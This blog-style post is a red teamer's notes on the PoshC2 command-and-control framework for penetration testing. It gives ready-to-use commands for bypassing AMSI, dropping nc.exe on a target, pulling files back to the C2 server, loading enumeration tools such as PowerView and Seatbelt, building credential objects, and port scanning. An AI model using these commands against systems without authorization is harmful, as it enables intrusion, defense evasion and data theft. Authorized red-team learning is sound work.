PoshC2: A Red Teamer's Notes
A quick reference guide for using PoshC2, a post-exploitation framework, during penetration testing and red teaming engagements.
This is an ongoing post containing my notes on PoshC2 usage.
What is PoshC2?
PoshC2 is command and control (C2) software. It is used to carry out post-exploitation tasks such as persistence, privilege escalation and lateral movement during penetration testing and red teaming exercises. It supports Python3, PowerShell (v2 and v5), C# and C++. The official documentation is available here.
All of PoshC2's functionality can be divided into five components:
PoshC2 Server - Serves payloads that, when executed on target machine(s), connect back to PoshC2. The server console also displays the output of commands executed on an implant. The server is written in Python.
Implants Receiver - Listens for incoming implant connections and aggregates them. It is also used to load modules and execute commands on a single implant, a chosen set of implants, or all implants.
Payloads - Commands, shellcode and executable binaries that, when executed on target machine(s) (aka implants), connect back to the Implants Receiver. Payloads are developed using C#, Python, PowerShell, JavaScript and VBScript, and support Windows, Linux (Python) and MacOS (Python).
Implants - Target machine(s) connected to PoshC2.
Modules - Scripts (PowerShell and Python) and executable binaries (C#) that help in conducting various post-exploitation tasks such as enumeration, privilege escalation, lateral movement, hash dumping and port forwarding. A comprehensive list of modules is available here.
How to use it?
The following video shows how to get PoshC2 up and running quickly. It covers:
Installation on Kali Linux 2020.2
Configuring PoshC2
Running the Posh-server and the Implants Receiver
Managing implants
Modules
Loading C# and PowerShell modules on an Implant
Running commands on an implant
Read this to learn more about the lab environment used in this video.
Useful Commands (C# Implants)
Selecting Implant(s)
To select a single implant, enter its ImplantID.
To select multiple implants, enter a comma-separated list of ImplantIDs.
To select all implants, enter ALL.
Quick Reference List of Commands
Issue the following command once one or more implants are selected to see all available commands:
help
Bypass AMSI
bypass-amsi
Upload files
upload-file <source file path> <destination file path>
Example: upload-file /usr/share/windows-binaries/nc.exe C:\Users\Public\nc.exe
Download files
download-file <file path>
Example: download-file 'C:\\Users\\Public\\supersecretdata.txt'
This will save a copy of the target file in the PoshC2 project directory.
List Modules
To list implant-specific modules, select an implant and issue the following command:
listmodules
To list all modules, issue the following command at the implant selection prompt:
listmodules
Load a C# Module
loadmodule <module name>
Example: loadmodule SharpView.exe
Load a PowerShell Module
pslo <module name>
Example: pslo powerview.ps1
You can also use loadmoduleforce to load a module.
Execute a PowerShell Command
sharpps <command>
Example: sharpps Get-ChildItem -Force -Recurse
Convert a Username and Password to a PSCredential object
sharpps [string]$userName = 'IND\user.ind02'
sharpps [string]$userPassword = 'Sup3rStr0ngP@ssw0rd'
sharpps [securestring]$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force
sharpps [pscredential]$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword)
After executing the above commands, $credObject can be passed to the -Credential parameter of any PowerShell command that accepts it.
Enumerate an Implant
ls-recurse <directory path>
Example: ls-recurse C:\Users
get-userinfo
get-computerinfo
loadmodule Seatbelt.exe
seatbelt all
sharpup
Port Scan
portscan <IP> <port range> <delay-in-seconds> <max threads>
Example: portscan "192.168.3.8" "1-1000" 1 100